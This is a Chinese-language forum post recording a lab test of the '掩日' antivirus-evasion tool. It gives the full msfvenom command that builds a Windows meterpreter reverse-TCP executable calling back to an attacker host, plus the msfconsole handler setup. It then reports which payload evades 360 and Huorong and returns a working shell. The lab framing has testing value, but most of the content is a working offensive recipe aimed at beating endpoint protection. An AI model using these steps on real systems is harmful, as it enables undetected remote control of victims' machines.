实战:掩日免杀

本贴最后更新于 1299 天前,其中的信息可能已经物是人非

更新时间:2021.04.28

1. 环境

攻击机: kali linux 10.211.55.23

受害机: Windows10 360主动防御

Windows7 火绒主动防御

2. 生成exe文件

在kali linux下使用msfvenom生成一个64位的exe文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe -o 1.exe

image.png

将文件分别发送至Windows10上,此时需要将受害者的机器关闭全部杀软

使用掩日3.0进行免杀处理(这里会提示报错,需要安装一个软件,按照提示安装即可)

下载地址:

https://github.com/1y0n/av_evasion_tool/

将文件直接拖过来就行了

image.png

最后会生成一个YR_1.exe文件

image.png

将这两个文件分别压缩备份,发送到window10和window7上

image.png

3. 静态测试

打开各自的杀软进行测试

3.1 360

image.png

均报毒

3.2 火绒

image.png

只有一个文件报毒

4. 上线测试

4.1 攻击机配置

msfconsole

use exploit/multi/handler

set LHOST 10.211.55.23

set LPORT 4444

set payload windows/x64/meterpreter/reverse_tcp

exploit

image.png

4.2 360下

4.2.1 1..exe

直接gg

image.png

4.2.2 免杀版1.exe

直接gg

image.png

4.3 火绒

4.3.1. 1.exe

gg

image.png

4.3.2 免杀版1.exe

上线正常

image.png

执行命令

image.png

5. 总结

总体上来说,这款免杀工具已经是非常强了,而且公开了这么久,还支持部分免杀,很厉害了!?

回帖
请输入回帖内容 ...